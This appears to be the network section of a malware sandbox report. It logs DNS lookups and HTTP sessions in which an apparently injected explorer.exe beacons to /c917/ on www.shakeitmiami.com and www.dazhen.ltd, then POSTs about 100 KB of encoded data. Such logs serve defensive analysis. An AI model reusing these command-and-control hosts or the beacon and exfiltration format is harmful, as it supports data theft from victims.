                    May 6, 2019 21:25:56.163670063 CEST8.8.8.8192.168.1.220xa16No error (0)www.dazhen.ltd.w.kunlunsl.com47.246.2.226A (IP address)IN (0x0001)
                    May 6, 2019 21:25:56.163670063 CEST8.8.8.8192.168.1.220xa16No error (0)www.dazhen.ltd.w.kunlunsl.com47.246.2.230A (IP address)IN (0x0001)
                    May 6, 2019 21:25:56.163670063 CEST8.8.8.8192.168.1.220xa16No error (0)www.dazhen.ltd.w.kunlunsl.com47.246.2.227A (IP address)IN (0x0001)
                    May 6, 2019 21:25:56.163670063 CEST8.8.8.8192.168.1.220xa16No error (0)www.dazhen.ltd.w.kunlunsl.com47.246.2.228A (IP address)IN (0x0001)
                    May 6, 2019 21:25:56.163670063 CEST8.8.8.8192.168.1.220xa16No error (0)www.dazhen.ltd.w.kunlunsl.com47.246.2.225A (IP address)IN (0x0001)
                    May 6, 2019 21:25:56.163670063 CEST8.8.8.8192.168.1.220xa16No error (0)www.dazhen.ltd.w.kunlunsl.com47.246.2.229A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • www.shakeitmiami.com
                    • www.dazhen.ltd

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.1.2249243208.91.197.9180C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    May 6, 2019 21:25:10.045095921 CEST21OUTGET /c917/?oHl4Lb5=nSCEaBLXfhTJ/xBIM1eG5VjHdYjSCo5E7UcE1As1Jcfg6SQ1mrA8W1jO4t4mCZy3/NbUbQ==&uFF4=XROl_rtXM HTTP/1.1
                    Host: www.shakeitmiami.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00
                    Data Ascii:
                    May 6, 2019 21:25:10.258433104 CEST22INHTTP/1.1 200 OK
                    Date: Mon, 06 May 2019 19:25:10 GMT
                    Server: Apache
                    Set-Cookie: vsid=931vr3047163101715501; expires=Sat, 04-May-2024 19:25:10 GMT; Max-Age=157680000; path=/; domain=www.shakeitmiami.com; HttpOnly
                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_EbvMjyOdug5Me0TOkeTJF4buuWK3AgKQLx7avWgdE0a+fqJkep5R2+wzCUmevS1fhv71Dy1yAlcjTbMQxer15A==
                    Content-Length: 2686
                    Keep-Alive: timeout=5, max=128
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 61 6b 65 69 74 6d 69 61 6d 69 2e 63 6f 6d 2f 3f 66 70 3d 59 74 58 78 50 44 78 32 39 75 71 25 32 42 75 58 45 53 71 38 6f 59 43 57 47 6d 47 4e 6c 71 36 55 68 69 54 36 57 6e 78 56 35 41 63 6c 6b 4f 25 32 46 6b 79 48 49 36 6b 6e 49 4c 68 67 36 74 78 59 49 33 42 6a 66 51 37 69 66 4c 32 6a 63 39 65 51 4e 70 65 52 33 55 25 32 46 48 41 67 71 70 6f 48 53 47 53 62 76 73 70 25 32 42 73 65 6d 78 76 77 48 61 57 31 4e 64 76 37 30 78 4c 59 45 77 46 7a 4d 64 51 4c 76 64 57 75 4f 76 25 32 42 4a 64 31 75 6c 32 54 61 52 31 51 67 6d 25 32 46 56 30 31 38 50 45 72 50 74 72 72 46 53 66 43 44 30 30 42 70 33 45 42 36 49 77 25 33 44 26 70 72 76 74 6f 66 3d 74 6f 56 39 66 65 64 71 58 46 4e 45 25 32 46 48 49 56 35 4a 75 32 35 73 5a 61 46 6a 54 37 39 34 7a 78 42 76 35 71 4c 75 62 59 66 58 4d 25 33 44 26 70 6f 72 75 3d 42 5a 6c 50 64 54 64 34 67 76 6f 37 44 41 4e 51 54 45 6e 64 4f 51 59 51 37 6b 48 44 56 73 38 70 53 69 62 55 47 6e 57 65 69 51 54 72 39 41 52 73 79 78 45 6c 69 4f 5a 79 5a 63 4f 7a 46 59 37 78 61 4e 46 6a 35 52 63 37 46 6c 76 64 79 44 35 51 76 48 49 4f 64 6a
                    Data Ascii: ...top.location="http://www.shakeitmiami.com/?fp=YtXxPDx29uq%2BuXESq8oYCWGmGNlq6UhiT6WnxV5AclkO%2FkyHI6knILhg6txYI3BjfQ7ifL2jc9eQNpeR3U%2FHAgqpoHSGSbvsp%2BsemxvwHaW1Ndv70xLYEwFzMdQLvdWuOv%2BJd1ul2TaR1Qgm%2FV018PErPtrrFSfCD00Bp3EB6Iw%3D&prvtof=toV9fedqXFNE%2FHIV5Ju25sZaFjT794zxBv5qLubYfXM%3D&poru=BZlPdTd4gvo7DANQTEndOQYQ7kHDVs8pSibUGnWeiQTr9ARsyxEliOZyZcOzFY7xaNFj5Rc7FlvdyD5QvHIOdj
                    May 6, 2019 21:25:10.258460999 CEST23INData Raw: 4b 54 42 53 53 4e 25 32 46 63 31 70 39 45 32 67 44 71 47 5a 4b 25 32 46 47 4d 42 51 5a 59 59 38 6f 68 38 4b 31 74 25 32 42 30 68 4d 25 32 42 33 69 4f 25 32 42 59 52 6b 61 4c 70 30 36 4c 6b 52 6b 37 4b 68 77 4b 6c 70 4e 50 72 6c 63 4c 4a 70 59 41
                    Data Ascii: KTBSSN%2Fc1p9E2gDqGZK%2FGMBQZYY8oh8K1t%2B0hM%2B3iO%2BYRkaLp06LkRk7KhwKlpNPrlcLJpYAIifqObiuy89FwfSHXyPFtqHTXO2%2FQIjOtYMHE94WZIoP2gk5OI72WtbA%3D%3D&cifr=1&oHl4Lb5=nSCEaBLXfhTJ%2FxBIM1eG5VjHdYjSCo5E7UcE1As1Jcfg6SQ1mrA8W1jO4t4mCZy3%2FNbUbQ%3D%3D&
                    May 6, 2019 21:25:10.258491993 CEST24INData Raw: 75 71 25 32 42 75 58 45 53 71 38 6f 59 43 57 47 6d 47 4e 6c 71 36 55 68 69 54 36 57 6e 78 56 35 41 63 6c 6b 4f 25 32 46 6b 79 48 49 36 6b 6e 49 4c 68 67 36 74 78 59 49 33 42 6a 66 51 37 69 66 4c 32 6a 63 39 65 51 4e 70 65 52 33 55 25 32 46 48 41
                    Data Ascii: uq%2BuXESq8oYCWGmGNlq6UhiT6WnxV5AclkO%2FkyHI6knILhg6txYI3BjfQ7ifL2jc9eQNpeR3U%2FHAgqpoHSGSbvsp%2BsemxvwHaW1Ndv70xLYEwFzMdQLvdWuOv%2BJd1ul2TaR1Qgm%2FV018PErPtrrFSfCD00Bp3EB6Iw%3D&prvtof=j5nNDKScmmBjNv3HKfRL8%2FUO2%2FAiu32DWY9xz%2BmzfRE%3D&poru=
                    May 6, 2019 21:25:10.258522034 CEST25INData Raw: 6f 65 62 6e 32 71 57 59 38 42 52 75 4d 55 64 6a 79 68 58 59 61 44 66 5a 59 44 46 54 39 47 33 56 44 6a 6e 79 52 25 32 46 45 6d 37 50 39 4c 63 46 64 45 55 50 39 36 73 59 45 34 64 52 75 52 72 56 41 70 56 67 6a 33 61 4f 63 32 53 39 30 56 65 62 5a 56
                    Data Ascii: oebn2qWY8BRuMUdjyhXYaDfZYDFT9G3VDjnyR%2FEm7P9LcFdEUP96sYE4dRuRrVApVgj3aOc2S90VebZVQWZ03XsDpM8ynlSl8eOTcqrb1QGpKXElDofKS1HRz2AcQP%2FN5vIdQu8ylFDikV2ttCKrKPCkZjfOIAgJETJDpYV29pj%2FfXJ4i4eFP7PBWllFkCEQ0KJDkhlg%3D%3D&oHl4Lb5=nSCEaBLXfhTJ%2FxBIM1eG
                    May 6, 2019 21:25:10.270538092 CEST25INData Raw: 6f 65 62 6e 32 71 57 59 38 42 52 75 4d 55 64 6a 79 68 58 59 61 44 66 5a 59 44 46 54 39 47 33 56 44 6a 6e 79 52 25 32 46 45 6d 37 50 39 4c 63 46 64 45 55 50 39 36 73 59 45 34 64 52 75 52 72 56 41 70 56 67 6a 33 61 4f 63 32 53 39 30 56 65 62 5a 56
                    Data Ascii: oebn2qWY8BRuMUdjyhXYaDfZYDFT9G3VDjnyR%2FEm7P9LcFdEUP96sYE4dRuRrVApVgj3aOc2S90VebZVQWZ03XsDpM8ynlSl8eOTcqrb1QGpKXElDofKS1HRz2AcQP%2FN5vIdQu8ylFDikV2ttCKrKPCkZjfOIAgJETJDpYV29pj%2FfXJ4i4eFP7PBWllFkCEQ0KJDkhlg%3D%3D&oHl4Lb5=nSCEaBLXfhTJ%2FxBIM1eG


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.1.224924447.246.2.23280C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    May 6, 2019 21:25:56.219759941 CEST26OUTGET /c917/?oHl4Lb5=iGVqKJabq6qQQGosgk35PP7J8LpIY7g2/xqRC4FpH3ix1hS6w0nKWvUQXf0Fn5J++7YKhg==&uFF4=XROl_rtXM&sql=1 HTTP/1.1
                    Host: www.dazhen.ltd
                    Connection: close
                    Data Raw: 00 00 00 00 00 00
                    Data Ascii:
                    May 6, 2019 21:25:57.170886040 CEST28INHTTP/1.1 404 Not Found
                    Server: Tengine
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 1864
                    Connection: close
                    Date: Mon, 06 May 2019 19:25:56 GMT
                    Vary: Accept-Encoding
                    Cache-Control: private
                    Set-Cookie: ASP.NET_SessionId=cvf30oid01f3tnzktbph5mu3; path=/; HttpOnly
                    X-AspNet-Version: 4.0.30319
                    X-Powered-By: ASP.NET
                    Ali-Swift-Global-Savetime: 1557170756
                    Via: cache24.l2hk71[24,404-1280,M], cache1.l2hk71[25,0], cache18.ru3[701,404-1280,M], cache6.ru3[895,0]
                    X-Swift-Error: orig response 4XX error
                    X-Cache: MISS TCP_MISS dirn:-2:-2
                    X-Swift-SaveTime: Mon, 06 May 2019 19:25:57 GMT
                    X-Swift-CacheTime: 0
                    X-Swift-Error: orig response 4XX error
                    Timing-Allow-Origin: *
                    EagleId: 2ff6029a15571707562454862e
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 79 65 73 27 20 6e 61 6d 65 3d 27 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 27 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 62 6c 61 63 6b 27 20 6e 61 6d 65 3d 27 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 27 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 27 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 09
                    Data Ascii: <!DOCTYPE html><html><head> <meta charset='utf-8'> <meta name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1,minimum-scale=1,user-scalable=no'> <meta content='yes' name='apple-mobile-web-app-capable' /> <meta content='black' name='apple-mobile-web-app-status-bar-style' /> <meta content='telephone=no' name='format-detection' /> <meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'> <title>404</title>
                    May 6, 2019 21:25:57.170972109 CEST28INData Raw: 3c 73 63 72 69 70 74 3e 0d 0a 09 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b
                    Data Ascii: <script>window.onload=function(){
                    May 6, 2019 21:25:57.171016932 CEST29INData Raw: 0d 0a 09 76 61 72 20 73 70 61 6e 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 70 61 6e 43 6c 6f 63 6b 27 29 3b 20 76 61 72 20 63 6f 75 6e 74 3d 34 3b 0d 0a 77 69 6e 64 6f 77 2e 73 65 74 49 6e 74 65 72 76 61
                    Data Ascii: var span= document.getElementById('spanClock'); var count=4;window.setInterval(function(){ span.innerHTML=count; if(count==0){window.location.href='/';} count--;},1000)}</script> <link type='text/css' rel='styleshee
                    May 6, 2019 21:25:57.171049118 CEST29INData Raw: 69 76 20 63 6c 61 73 73 3d 27 65 72 72 6f 72 69 6e 2d 62 6f 74 74 6f 6d 27 3e 3c 69 6d 67 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6e 77 7a 69 6d 67 2e 77 65 7a 68 61 6e 2e 63 6e 2f 43 6f 6e 74 65 6e 74 2f 55 6e 75 73 75 61 6c 2f 69 6d 61 67 65
                    Data Ascii: iv class='errorin-bottom'><img src='https://nwzimg.wezhan.cn/Content/Unusual/images/404-2.png'></div> </div> </div></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.1.224924547.246.2.23280C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    May 6, 2019 21:25:59.238399982 CEST32OUTPOST /c917/ HTTP/1.1
                    Host: www.dazhen.ltd
                    Connection: close
                    Content-Length: 104865
                    Cache-Control: no-cache
                    Origin: http://www.dazhen.ltd
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://www.dazhen.ltd/c917/
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate
                    Data Raw: 6f 48 6c 34 4c 62 35 3d 71 6b 5a 51 55 73 58 75 79 5a 79 66 42 69 5a 33 77 55 69 6d 56 4a 58 5a 39 71 64 4c 59 34 6f 56 6f 55 54 69 50 70 70 63 54 47 79 51 28 42 47 54 6e 6b 48 66 44 64 6f 64 4a 6f 41 68 69 75 63 4d 7a 6f 41 74 37 64 65 55 50 6c 35 75 50 45 4c 4f 30 50 4c 6c 63 78 66 73 46 61 47 4b 6f 47 35 43 6c 33 45 47 42 6e 31 53 43 6e 79 59 59 35 41 66 49 74 33 58 54 4d 71 46 4c 43 4c 54 54 38 44 79 56 78 7e 65 71 45 70 6e 6b 71 4f 73 75 41 47 79 49 76 62 55 4a 48 4a 45 77 6f 7e 48 44 46 44 57 6f 6d 7e 4a 48 44 28 5f 6b 32 72 52 37 50 55 38 31 71 54 44 77 38 42 4c 7a 69 6f 55 44 72 74 74 48 46 78 5f 4c 68 51 58 59 78 64 44 53 54 63 53 74 42 6f 61 59 4f 7e 61 73 53 57 37 33 58 35 50 58 79 6d 41 4e 64 37 30 48 43 6d 4d 34 63 6b 45 66 33 66 51 50 79 47 55 43 54 79 4e 39 78 39 2d 4e 63 59 6c 6a 51 4a 56 4f 6f 55 64 6e 34 67 48 54 63 46 79 4a 51 39 45 58 65 5a 52 6d 51 7a 58 57 6b 50 75 79 2d 68 4f 75 6c 30 39 4b 30 4b 4b 77 67 47 76 78 2d 74 71 75 77 71 61 63 42 6f 58 68 79 47 6a 57 7a 50 45 75 4e 6f 51 30 65 4d 41 42 71 46 37 77 78 46 38 50 71 48 31 4a 45 44 37 71 6b 38 4c 4d 50 70 76 4a 46 53 36 77 64 4c 55 49 50 45 39 65 61 62 6f 72 72 75 72 54 32 70 41 48 6c 42 37 6b 5f 42 6a 6f 30 57 66 4b 5f 45 46 62 71 31 5a 75 48 65 53 6c 75 56 66 7e 53 62 77 61 59 59 77 33 6f 6c 6e 65 66 46 5f 7a 44 59 5f 61 41 33 4a 41 59 64 6e 4d 69 78 36 75 30 75 34 75 52 32 4f 28 4a 7a 34 35 41 6c 76 4c 57 48 79 4e 45 41 33 48 50 76 33 33 34 49 4e 79 62 49 65 55 79 56 51 6b 59 42 57 76 38 78 43 54 75 63 61 69 37 4f 63 71 62 62 34 76 67 6f 61 67 61 44 5a 47 65 36 57 56 4d 72 48 53 58 46 36 49 4a 6f 4e 56 6c 57 41 56 4d 5a 34 49 72 53 4a 66 61 49 44 49 67 36 32 71 75 70 34 5a 54 79 57 74 45 6e 4f 6a 4e 64 33 70 63 32 7a 30 5f 4a 52 39 72 4a 43 7e 75 47 47 72 59 56 77 4a 4c 6a 57 4f 65 77 6f 6b 51 4e 67 6d 4c 52 79 72 78 44 38 30 62 53 2d 64 6b 51 6a 32 4a 52 4d 68 42 6a 4c 5a 42 61 44 68 4f 30 56 4a 4e 28 5f 54 6b 72 58 62 62 46 5a 7e 74 43 79 56 37 51 38 47 45 36 66 55 68 4f 36 4a 6f 37 6b 66 49 58 55 61 68 4b 4d 74 74 50 2d 33 74 6c 42 73 77 6f 67 43 51 45 37 52 34 70 6d 53 47 67 61 4a 56 4f 36 6f 49 59 30 72 33 49 57 63 45 6b 52 7a 2d 56 51 6f 6c 49 6f 54 75 58 38 30 7a 39 57 50 7a 57 6c 6c 6f 4b 66 63 75 4d 49 62 4f 43 53 32 79 56 31 59 4f 58 62 32 77 53 48 37 5f 50 68 32 64 45 58 4d 7a 4d 2d 52 4b 4d 67 32 34 4a 44 68 65 68 56 78 35 7e 75 4d 70 30 51 72 72 56 42 79 30 30 53 52 4e 7a 75 36 57 75 54 69 64 31 54 30 59 53 47 51 75 70 50 57 36 48 7a 52 36 62 61 4e 43 76 4b 36 71 47 32 32 6c 77 61 5a 4b 58 41 31 75 56 52 41 75 54 64 39 76 66 44 59 6f 51 7a 49 44 44 47 58 4e 6f 34 43 7a 62 32 65 72 73 79 61 66 43 66 46 59 61 57 7a 47 4c 59 44 33 5a 51 63 30 41 70 4d 54 45 59 34 54 4e 65 72 61 63 67 65 6b 6e 6f 44 50 57 36 67 57 4b 64 71 32 72 52 6d 48 52 39 4f 4f 35 58 67 30 68 51 4c 6b 73 67 73 49 6a 79 31 57 33 50 71 43 4c 42 65 5f 47 38 4a 31 48 74 59 55 72 6d 50 31 58 54 46 67 39 6a 61 5a 6d 69 73 4f 6d 5a 61 33 79 6b 62 72 53 52 54 54 53 74 64 65 57 48 70 33 58 61 75 61 46 67 73 6d 4f 63 4a 64 31 35 4d 31 58 2d 75 41 55 64 73 4d 4b 53 67 43 50 69 5a 57 51 59 34 74 73 2d 5a 52 68 42 6d 69 55 48 32 71 78 76 69 6f 4a 77 39 45 7e 45 77 32 4b 51 65 31 55 47 34 72 59 32 67 75 45 6b 32 49 72 4b 63 79 31 45 58 42 4b 53 73 76 36 50 78 49 66 31 68 66 42 74 6a 71 6a 57 6e 5a 44 72 71 73 48 43 79 51 54 4c 53 31 79 38 7a 50 55 34 4f 77 77 49 4a 47 35 47 75 45 4a 4e 41 35 62 69 34 57 32 41 72 61 43 79 36 55 53 5a 58 44 4f 41 32 33 67 5a 36 31 71 76 76 36 6a 32 4f 4b 66 31 46 76 33 4b 47 73 4c 31 44 52 63 53 44 5f 31 34 34 61 7a 63 42 74 69 42 4e 34 5a 44 47 32 30 75 6c 42 53 4d 38 72 31 42 68 41 49 44 4a 38 34 63 68 59 70 47 78 50 6b 6e 6e 75 63 71 59 6e 4f 4e 46 56 6f 34 44 38 79 41 48 38 46 51 72 4f 50 6f 55 56 33 30 74 38 72 44 57 58 79 7a 50 61 33 70 58 46 47 4b 33 4e 69 2d 34 67 4a 79 71 2d 61 65 4c 4b 63 79 36 35 61 41 54 6f 51 44 36 46 76 39 4d 63 4e 4e 6a 71 31 39 33 52 78 4c 55 76 7e 37 75 74 59 6c 32 41 6c 71 75 7a 59 65 66 54 42 31 28 35 45 62 4b 71 70 53 62 59 34 73 50 4a 7a 6a 7e 71 5a 70 75 62 74 47 78 73 50 4c 33 67 77 5a 46 63 75 47 44 57 78 77 67 46 46 77 36 47 6a 74 70 7a 76 43 66 53 32 45 71 4d 56 64 73 6a 42 66 64 44 78 4c 41 33 76 5a 70 6b 38 50 6a 58 79 4b 42 34 79 68 53 62 73 61 33 32 4a 51 53 75 57 57 39 44 4d 6f 51 31 42 4d 56 4e 35 52 30 36 74 50 78 44 72 36 6b 34 35 2d 33 47 58 58 30 38 4b 42 51 56 44 30 35 4b 36 72 48 34 32 67 6e 71 51 79 55 72 51 68 61 6a 66 6b 64 7a 66 65 28 58 72 5a 6a 66 31 6e 79 58 61 4b 34 62 50 39 4f 49 78 43 71 53 54 67 66 63 62 58 69 6b 54 49 51 38 65 7a 4f 43 6e 47 7e 78 64 47 67 30 35 49 36 4e 33 41 67 4d 30 4b 48 43 59 6e 71 71 50 46 59 30 50 61 6e 2d 37 45 65 49 70 42 65 71 51 51 38 49 67 79 68 67 5a 4c 4e 68 41 57 58 63 4a 54 62 42 43 75 35 45 42 6d 6e 70 56 64 37 70 45 2d 45 51 57 35 62 59 37 41 57 62 38 6f 65 76 5a 6e 4d 34 71 6b 70 73 48 72 37 63 6d 71 41 4e 62 72 51 64 61 79 54 49 47 64 74 74 41 69 32 38 33 61 64 73 43 31 53 62 7e 79 47 39 78 4e 59 46 49 31 49 39 45 36 54 44 42 34 68 69 34 57 74 33 74 52 57 39 6f 31 31 2d 49 76 68 47 57 62 4f 36 6b 52 66 7a 71 31 4f 61 39 75 4c 35 54 32 77 36 4a 57 44 77 33 5f 50 67 73 6b 61 5f 66 6b 4e 32 37 69 65 36 4b 36 34 44 65 33 71 52 28 33 70 5a 36 56 4e 4a 75 69 4d 56 56 33 63 59 39 43 65 63 78 67 64 31 48 38 70 51 46 2d 66 73 63 67 65 57 61 4f 7e 63 7e 78 31 47 66 46 61 72 36 7a 4c 37 54 48 47 44 36 31 4c 5f 69 71 6e 51 74 68 6a 51 52 6f 76 61 54 49 6d 53 36 44 7e 54 45 72 53 6d 64 66 33 5a 57 4f 47 64 61 79 63 41 35 66 46 35 28 33 71 59 6a 46 4b 68 6e 62 4f 33 45 4b 59 7a 4b 41 30 59 63 53 39 54 6d 57 72 58 49 39 61 54 38 5a 61 6f 47 64 31 6e 52 6e 57 4a 75 42 58 36 6d 57 69 56 30 59 70 50 45 71 57 66 41 6e 45 65 6f 6d 76 7a 47 6d 6b 58 4a 6d 7a 65 64 30 33 41 75 66 67 4a 53 78 42 66 4d 6c 6b 4d 77 44 64 69 54 57 56 6a 4f 68 42 4d 4b 33 6e 5f 49 47 4d 50 31 48 74 2d 59 49 57 42 4b 79 6d 4e 73 33 65 37 55 33 46 68 72 59 68 4c 37 52 47 6a 77 43 33 47 70 43 48 78 4c 66 52 42 33 5f 54 35 50 7a 35 52 67 5f 6d 72 28 50 58 56 42 33 6a 39 78 41 39 6b 71 71 54 58 28 79 32 51 76 61 31 75 66 5a 51 7a 6b 48 31 6c
                    Data Ascii: oHl4Lb5=qkZQUsXuyZyfBiZ3wUimVJXZ9qdLY4oVoUTiPppcTGyQ(BGTnkHfDdodJoAhiucMzoAt7deUPl5uPELO0PLlcxfsFaGKoG5Cl3EGBn1SCnyYY5AfIt3XTMqFLCLTT8DyVx~eqEpnkqOsuAGyIvbUJHJEwo~HDFDWom~JHD(_k2rR7PU81qTDw8BLzioUDrttHFx_LhQXYxdDSTcStBoaYO~asSW73X5PXymANd70HCmM4ckEf3fQPyGUCTyN9x9-NcYljQJVOoUdn4gHTcFyJQ9EXeZRmQzXWkPuy-hOul09K0KKwgGvx-tquwqacBoXhyGjWzPEuNoQ0eMABqF7wxF8PqH1JED7qk8LMPpvJFS6wdLUIPE9eaborrurT2pAHlB7k_Bjo0WfK_EFbq1ZuHeSluVf~SbwaYYw3olnefF_zDY_aA3JAYdnMix6u0u4uR2O(Jz45AlvLWHyNEA3HPv334INybIeUyVQkYBWv8xCTucai7Ocqbb4vgoagaDZGe6WVMrHSXF6IJoNVlWAVMZ4IrSJfaIDIg62qup4ZTyWtEnOjNd3pc2z0_JR9rJC~uGGrYVwJLjWOewokQNgmLRyrxD80bS-dkQj2JRMhBjLZBaDhO0VJN(_TkrXbbFZ~tCyV7Q8GE6fUhO6Jo7kfIXUahKMttP-3tlBswogCQE7R4pmSGgaJVO6oIY0r3IWcEkRz-VQolIoTuX80z9WPzWlloKfcuMIbOCS2yV1YOXb2wSH7_Ph2dEXMzM-RKMg24JDhehVx5~uMp0QrrVBy00SRNzu6WuTid1T0YSGQupPW6HzR6baNCvK6qG22lwaZKXA1uVRAuTd9vfDYoQzIDDGXNo4Czb2ersyafCfFYaWzGLYD3ZQc0ApMTEY4TNeracgeknoDPW6gWKdq2rRmHR9OO5Xg0hQLksgsIjy1W3PqCLBe_G8J1HtYUrmP1XTFg9jaZmisOmZa3ykbrSRTTStdeWHp3XauaFgsmOcJd15M1X-uAUdsMKSgCPiZWQY4ts-ZRhBmiUH2qxvioJw9E~Ew2KQe1UG4rY2guEk2IrKcy1EXBKSsv6PxIf1hfBtjqjWnZDrqsHCyQTLS1y8zPU4OwwIJG5GuEJNA5bi4W2AraCy6USZXDOA23gZ61qvv6j2OKf1Fv3KGsL1DRcSD_144azcBtiBN4ZDG20ulBSM8r1BhAIDJ84chYpGxPknnucqYnONFVo4D8yAH8FQrOPoUV30t8rDWXyzPa3pXFGK3Ni-4gJyq-aeLKcy65aAToQD6Fv9McNNjq193RxLUv~7utYl2AlquzYefTB1(5EbKqpSbY4sPJzj~qZpubtGxsPL3gwZFcuGDWxwgFFw6GjtpzvCfS2EqMVdsjBfdDxLA3vZpk8PjXyKB4yhSbsa32JQSuWW9DMoQ1BMVN5R06tPxDr6k45-3GXX08KBQVD05K6rH42gnqQyUrQhajfkdzfe(XrZjf1nyXaK4bP9OIxCqSTgfcbXikTIQ8ezOCnG~xdGg05I6N3AgM0KHCYnqqPFY0Pan-7EeIpBeqQQ8IgyhgZLNhAWXcJTbBCu5EBmnpVd7pE-EQW5bY7AWb8oevZnM4qkpsHr7cmqANbrQdayTIGdttAi283adsC1Sb~yG9xNYFI1I9E6TDB4hi4Wt3tRW9o11-IvhGWbO6kRfzq1Oa9uL5T2w6JWDw3_Pgska_fkN27ie6K64De3qR(3pZ6VNJuiMVV3cY9Cecxgd1H8pQF-fscgeWaO~c~x1GfFar6zL7THGD61L_iqnQthjQRovaTImS6D~TErSmdf3ZWOGdaycA5fF5(3qYjFKhnbO3EKYzKA0YcS9TmWrXI9aT8ZaoGd1nRnWJuBX6mWiV0YpPEqWfAnEeomvzGmkXJmzed03AufgJSxBfMlkMwDdiTWVjOhBMK3n_IGMP1Ht-YIWBKymNs3e7U3FhrYhL7RGjwC3GpCHxLfRB3_T5Pz5Rg_mr(PXVB3j9xA9kqqTX(y2Qva1ufZQzkH1l
                    May 6, 2019 21:25:59.293603897 CEST37OUTData Raw: 66 62 62 5a 47 31 58 57 43 62 75 52 6a 67 74 37 33 48 71 78 66 79 65 64 4a 5f 62 58 30 76 52 32 58 31 76 70 74 5f 62 6a 54 52 33 37 56 52 56 31 45 74 75 47 6f 59 7e 51 72 6b 28 39 32 48 28 59 79 6f 56 61 55 78 72 70 75 41 59 62 66 6a 6b 59 45 67
                    Data Ascii: fbbZG1XWCbuRjgt73HqxfyedJ_bX0vR2X1vpt_bjTR37VRV1EtuGoY~Qrk(92H(YyoVaUxrpuAYbfjkYEgR_WBatHhtxPRZQQB5gv8h8GT4ISf8gOpjRQzUlbIkbkiz6Mp6Y75efrdfSnZWVvik4nqS1KoyGa_r15FpsuRycrgdPL0imHksuqXYqDvI5wPPCAcwGF1baQjO4rXwLIdsS4aaUGg3Qtz1ULosa5R8V3S5w0e5KbjD
                    May 6, 2019 21:25:59.348872900 CEST46OUTData Raw: 32 52 7e 46 39 79 6c 75 56 43 52 51 56 73 69 4f 45 56 43 74 52 4b 64 6a 4b 58 54 66 61 6e 6c 4f 75 52 5a 7a 69 42 65 53 30 56 57 54 69 61 71 4b 32 65 37 66 33 47 36 37 38 6e 44 36 62 39 71 69 59 51 6e 6a 36 6b 6d 46 34 33 36 32 79 69 61 64 79 6b
                    Data Ascii: 2R~F9yluVCRQVsiOEVCtRKdjKXTfanlOuRZziBeS0VWTiaqK2e7f3G678nD6b9qiYQnj6kmF4362yiadykHnJ1DG4PDoQhvndvFKKDCRZyaq3p~UDKkWYyyUqrzg5V9zLVZIFNMDjqYLJVRLPVZ4D_V3orHVlbgAGM4IZCkkSerqcbqPcWtFs-60g8EN7iu6iXiHn7T4ASUsI2B2(mz1fvVYV3bKD24J90YBGtBhN4dBtf3kecI
